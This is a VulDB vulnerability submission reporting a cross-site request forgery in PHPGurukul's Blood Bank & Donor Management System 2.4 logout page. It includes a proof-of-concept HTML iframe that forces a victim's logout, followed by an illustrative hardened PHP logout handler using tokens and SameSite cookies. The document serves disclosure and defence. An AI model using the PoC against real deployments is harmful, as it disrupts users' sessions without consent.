| Title | https://phpgurukul.com/ Blood Bank & Donor Management System v2.4 CSRF Improper Input Validation |
|---|---|
| Description | There is no CSRF token, allowing an attacker to trigger any activity, including logout. An attacker can embed an iframe that has the logout URL and send it to the victim. If the victim clicks on the link, they will automatically be logged out. (PoC HTML below.) |
| User | Lo1x (UID 79468) |
| Submission | 12/25/2024 16:23 (1 Year ago) |
| Moderation | 12/25/2024 19:24 (3 hours later) |
| Status | Accepted |
| VulDB entry | 289318 [PHPGurukul Blood Bank & Donor Management System 2.4 /logout.php cross-site request forgery] |
| Points | 17 |

PoC HTML from the submission:

```html
<!DOCTYPE html>
<html>
<body>
  <!-- Loading the attacker's page makes the browser fetch logout.php with the
       victim's session cookie attached; the GET request alone ends the session. -->
  <iframe
    src="http://localhost/bbdms/logout.php"
    name="myLogoutFrame"
    style="border:0px #FFFFFF none;"
    scrolling="no"
    frameborder="0"
    marginheight="0"
    marginwidth="0"
    height="400"
    width="600"
    allowfullscreen>
  </iframe>
</body>
</html>
```
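The root cause is that a state-changing action (ending the session) is performed on a plain GET request that carries no proof of the user's intent, so any third-party page the victim loads can trigger it. The following hardened logout handler is an added example written for this page; it is not PHPGurukul's code and it does not claim to match the application's actual logout.php. The file name `logout.php`, the redirect target `index.php` and the session key `csrf_token` are assumptions made for illustration. It combines a synchronizer token (issued per session, checked with `hash_equals`), a POST-only requirement, and a `SameSite=Lax` session cookie, which the browser withholds on cross-site subresource loads such as the iframe in the PoC.

```php
<?php
// Added example: a hypothetical CSRF-resistant logout handler. Not PHPGurukul's
// code; "logout.php", "index.php" and the "csrf_token" session key are assumed.
// Requires PHP 7.3+ for the array forms of session_set_cookie_params/setcookie.

// Harden the session cookie before the session starts. SameSite=Lax means the
// browser does not send the cookie on cross-site subresource requests such as
// a third-party <iframe src="...logout.php">, the exact vector in the PoC.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => isset($_SERVER['HTTPS']), // make this unconditionally true behind HTTPS
    'samesite' => 'Lax',
]);
session_start();

// Issue one synchronizer token per session, created lazily on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session token in constant time.
function csrf_token_valid(?string $submitted): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // The session is destroyed only on a POST that carries a valid token.
    // A GET issued by an iframe never reaches this branch.
    if (!csrf_token_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }

    // Clear server-side state and expire the session cookie on the client.
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', [
            'expires'  => time() - 42000,
            'path'     => $p['path'],
            'domain'   => $p['domain'],
            'secure'   => $p['secure'],
            'httponly' => $p['httponly'],
            'samesite' => $p['samesite'],
        ]);
    }
    session_destroy();
    header('Location: index.php');
    exit;
}

// GET: render a confirmation form carrying the token instead of logging out.
// Loading this URL in an iframe therefore has no effect on the session.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<!DOCTYPE html>
<form method="post" action="logout.php">
  <input type="hidden" name="csrf_token" value="{$token}">
  <button type="submit">Log out</button>
</form>
HTML;
```

With this handler in place, the submitted PoC only renders the confirmation form inside the attacker's iframe (or, with `SameSite=Lax` enforced, renders it without any session cookie at all); the victim's session survives. The same token check belongs on every other state-changing endpoint in the application, since the submission notes that no CSRF token exists anywhere, not only on logout.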